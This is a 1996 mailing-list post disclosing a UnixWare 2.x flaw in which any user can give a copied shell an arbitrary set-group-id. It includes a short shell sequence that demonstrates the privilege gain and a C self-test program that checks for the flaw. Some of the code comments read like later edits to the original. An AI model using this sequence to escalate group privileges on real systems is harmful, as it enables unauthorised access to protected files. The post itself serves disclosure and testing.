
More on the UnixWare problem


From: tv () pobox com (Todd Vierling)
Date: Fri, 23 Aug 1996 16:11:25 -0400


I'm afraid to do this, but all, here's the source to that binary I posted.
Read it and gasp.  :( The vendor's been notified but it'll be a while before
I see action.  I've contacted them; there's a trouble ticket open; I've also
just learned that someone has leaked the details and it's flowing around the
net already.  CRINGE!

You'll note that I took pains to hide the program's function, for good
reason.  I'd been through the runaround at SCO for some time (I spent more than
an hour on hold today alone <yikes>), but finally it was demonstrated to me
by the following command sequence by a kind SCO engineer that on UnixWare
2.x (not just 2.0x, but 2.1 as well), the set-group-id privilege can be
compromised by *any user*.

% cp /usr/bin/ksh .
% chmod 2700 ./ksh
% chgrp 23456 ./ksh
% ./ksh
id

And 'id' reports effective group ID of 23456.  Oh, s**t.  Watch out,
/dev/kmem.  How about mode 775 directories?  What, you say /usr/bin comes
that way by default, group 'bin'?  Someone get me a bottle of Advil.  Oh,
it's a high-security system?  Make that a double--of codeine.

=====

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

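#define KEYMATCH "\x1D\xFC\x3A\x2FMZ"
#define TESTGRP 17186

/*
 * Fold bytes 3, 2 and 0 of r into byte 1 and return the result.
 *
 * This is the expression the masks and shifts were evidently meant to
 * form.  Written as `r & 0xFF000000 >> 16`, the shift binds tighter than
 * the mask, every term collapses to `r & 0xFF00`, and the whole
 * expression returns r unchanged.
 */
static unsigned long mix_code(unsigned long r)
{
        unsigned long mixed = ((r & 0xFF000000UL) >> 16)
                            ^ ((r & 0x00FF0000UL) >> 8)
                            ^ ((r & 0x000000FFUL) << 8);

        return (r & 0xFFFF00FFUL) | mixed;
}

/*
 * Child side: reached only when the binary is re-executed with KEYMATCH.
 * Reports on stderr whether the exec'd image picked up TESTGRP as its
 * effective gid.  The printed "code" is a clock-seeded random() value
 * that is only used as a marker in the message.
 */
static void report_result(const char *prog)
{
        if (getegid() == TESTGRP) {
                unsigned long r;

                srandom((unsigned)time(NULL));
                r = mix_code((unsigned long)random());
                fprintf(stderr, "%s: system vulnerable code 0x%lX\n", prog, r);
        } else {
                fprintf(stderr, "%s: system not vulnerable\n", prog);
        }
}

/*
 * Put the binary at path back to the group and mode recorded in st.
 * Must run on every path once the set-gid test mode has been applied;
 * otherwise the file is left set-gid TESTGRP.
 */
static void restore_binary(const char *path, const struct stat *st)
{
        chown(path, (uid_t)-1, st->st_gid);
        chmod(path, st->st_mode);
}

/*
 * Self-test for the UnixWare 2.x set-group-id problem described above.
 *
 * Run with no arguments and a pathname (./prog, not via $PATH).  The
 * program temporarily gives its own binary group TESTGRP and mode 02700
 * (set-gid, owner-only), re-executes itself with KEYMATCH, and lets the
 * child report whether its effective gid became TESTGRP.  The original
 * group and mode are restored afterwards.
 *
 * Every path exits with status 0 and reports through stderr; the
 * diagnostic strings are the program's interface and are unchanged.
 */
int main(int argc, char **argv)
{
        struct stat st;
        pid_t p;

        if (argc < 1 || argv[0] == NULL) {
                /* Nothing to stat and nothing to report with. */
                return 0;
        }
        if (argc == 2 && !strcmp(argv[1], KEYMATCH)) {
                report_result(argv[0]);
                return 0;
        }
        if (argc > 1) {
                fprintf(stderr, "%s: don't supply any arguments\n", argv[0]);
                return 0;
        }
        /* argv[0] is reused as the path to stat/chmod/exec, so it must be one. */
        if (!strchr(argv[0], '/')) {
                fprintf(stderr, "%s: user error: run me with a pathname, not in $PATH\n",
                        argv[0]);
                return 0;
        }
        if (stat(argv[0], &st)) {
                fprintf(stderr, "%s: system error: cannot stat my binary?\n", argv[0]);
                return 0;
        }
        if (st.st_uid != geteuid() && st.st_uid != getuid()) {
                fprintf(stderr, "%s: user error: does this uid own my binary?\n",
                        argv[0]);
                return 0;
        }
        /*
         * Give the binary the test group.  A kernel that enforces group
         * membership refuses this with EPERM; in that case the set-gid
         * re-exec below could only ever report "not vulnerable", so say
         * so now and leave the file untouched.  Any other failure is not
         * a verdict; carry on so the chmod/re-exec path reports it.
         */
        if (chown(argv[0], (uid_t)-1, TESTGRP) && errno == EPERM) {
                fprintf(stderr, "%s: system not vulnerable\n", argv[0]);
                return 0;
        }
        if (chmod(argv[0], 02700)) {
                restore_binary(argv[0], &st);
                fprintf(stderr, "%s: user error: cannot chmod my own binary?\n",
                        argv[0]);
                return 0;
        }
        /*
         * From here the binary is set-gid TESTGRP, so restore_binary()
         * must run on every remaining path.  fork() instead of vfork():
         * a vfork child may only exec or _exit, so the fprintf() on exec
         * failure was undefined.  waitpid() keeps the restore after the
         * child's exec (the effective gid is fixed at exec time).
         */
        if ((p = fork()) == -1) {
                restore_binary(argv[0], &st);
                fprintf(stderr, "%s: system error: cannot fork\n",
                        argv[0]);
                return 0;
        }
        if (p == 0) {
                execl(argv[0], argv[0], KEYMATCH, (char *)NULL);
                fprintf(stderr, "%s: system error: cannot exec\n",
                        argv[0]);
                _exit(0);
        }
        while (waitpid(p, NULL, 0) == -1 && errno == EINTR) {
                /* interrupted by a signal; keep waiting */
        }
        restore_binary(argv[0], &st);
        return 0;
}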

=====
== Todd Vierling (Personal tv () pobox com; Business tv () iag net) Cast a vote! ==
== System administrator/technician, Internet Access Group, Orlando Florida ==
== Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==


